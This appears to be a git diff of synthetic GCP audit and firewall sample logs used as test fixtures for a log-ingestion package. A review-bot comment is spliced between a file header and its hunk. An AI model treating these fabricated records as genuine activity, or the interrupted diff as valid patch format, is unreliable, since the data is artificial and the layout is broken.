{"insertId":"yonau3dc2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com","status":{"code":7,"message":"PERMISSION_DENIED"}},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"}
 {"insertId":"87efd529-6349-45d2-b905-fc607e6c5d3b","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"cert-manager-webhook:auth-delegator\" of ClusterRole \"system:auth-delegator\" to ServiceAccount 
\"cert-manager-webhook/cert-manager\""},"logName":"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"5555555-6349-45d2-b905-fc607e6c5d3b","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:serviceaccount:cert-manager:cert-manager-webhook"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","resource":"authorization.k8s.io/v1beta1/subjectaccessreviews"}],"methodName":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","request":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":false}},"requestMetadata":{"callerIp":"10.11.12.13","callerSuppliedUserAgent":"webhook/v0.0.0 (linux/amd64) kubernetes/$Format"},"resourceName":"authorization.k8s.io/v1beta1/subjectaccessreviews","response":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":true,"reason":"RBAC: allowed by ClusterRoleBinding \"system:discovery\" of ClusterRole \"system:discovery\" to Group 
\"system:authenticated\""}},"serviceName":"k8s.io","status":{"code":0}},"receiveTimestamp":"2020-08-05T21:07:32.157698684Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2020-08-05T21:07:30.974750Z"}
-{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"1.2.3.4","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"}
-{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"2.3.4.5","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"}
+{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"}
+{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"}
diff --git a/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log b/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log
index 0843196acc5..7b3ab77e457 100644
--- a/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log
+++ b/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log
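Review bot: Both rewritten records in this hunk (insertIds v2spcwdzmc2 and -c7ctxmd2zab) now carry the same callerIp, 67.43.156.13, where the originals had two distinct callers, so the image-insert and the instance-stop samples can no longer be told apart by source in anything keyed on the caller address or its geo enrichment. These are the only two non-private callers in the file, which makes the sample set noticeably less varied for dashboards and for exercising per-source detection logic. If the range these addresses are presumably drawn from (a test GeoIP subset) has more than one usable host, giving the stop event its own, e.g. a constructed neighbour such as `"callerIp":"67.43.156.14"`, keeps the original distinction; I would confirm against the pipeline test expectations before changing it, since those may pin the exact value.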
@@ -1,22 +1,22 @@
 {"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.128.0.16","dest_port":80,"protocol":6,"src_ip":"10.142.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"12345667","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} 
{"insertId":"1dobeotg13df9f7","jsonPayload":{"connection":{"dest_ip":"10.128.0.10","dest_port":57794,"protocol":6,"src_ip":"10.142.0.16","src_port":80},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"EGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"892378332","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} 
-{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"}
-{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-1
0-30T13:52:42.191988835Z"}
-{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} 
-{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} 
-{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"}
-{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr 
Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"}
-{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"} 
-{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"}
-{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol 
Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"}
-{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} 
-{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} 
-{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} 
-{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"}
-{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} 
-{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} 
-{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} 
